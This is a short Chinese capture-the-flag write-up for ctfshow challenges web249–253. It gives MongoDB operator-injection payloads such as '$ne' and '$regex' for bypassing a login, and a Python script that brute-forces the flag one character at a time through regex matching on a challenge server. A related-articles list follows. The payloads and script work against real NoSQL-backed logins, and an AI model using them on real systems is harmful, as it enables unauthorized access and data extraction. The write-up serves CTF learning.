CTFSHOW_SQL注入web249-253 - 悦读

CTFSHOW_SQL注入web249-253

试了其他文章的payload，没用成功，自己就写下来吧。
做题有三点注意，url编码，加不加8080（有的脚本url里面加8080，如果不行就去掉，行就不管），用不用Burpsuite的Repeater（有的信息要用Repeater才能看见）

web249

/api/?id[]=flag&page=1&limit=10

一些文章的payload少了page=1&limit=10

web250

我用username[$ne]=1&password[$ne]=1失败了，下面这个可以

username[$ne]=1&password[$regex]=ct

web251

username[$ne]=1&password[$regex]={

web252

username[$ne]=1&password[$regex]={

web253

用yu师傅的脚本就行

#author:yu22x
import requests
url="http://23fde3ab-6f1e-45f0-a918-576d3ac9525b.challenge.ctf.show/api/index.php"
flag="ctfshow{"
s='0123456789abcdef-}'
for i in range(9,46):
    print(i)
    for j in s:
        data={
            'username[$ne]':'1',
            'password[$regex]':f'^{flag+j}'
        }
        r=requests.post(url=url,data=data)
        if r"\u767b\u9646\u6210\u529f" in r.text:
            flag+=j
            print(flag)
            if j=="}":
                exit()
            break

悦读

道可道，非常道；名可名，非常名。无名，天地之始，有名，万物之母。故常无欲，以观其妙，常有欲，以观其徼。此两者，同出而异名，同谓之玄，玄之又玄，众妙之门。

reveal.js 入门使用方法

20 | 理论六：我为何说KISS、YAGNI原则看似简单，却经常被用错？

腾讯测试开发面试题

HTML+CSS+JS实现贪吃蛇游戏源码_贪吃蛇源码html

Matplotlib解决中文显示异常问题

计算机网络——物理层（数据通信基础知识）

centOS7下实践查询版本/CPU/内存/硬盘容量等硬件信息

C++入门知识——构造函数初始化列表、static与友元

案例（一）利用RFM模型做用户价值分析

;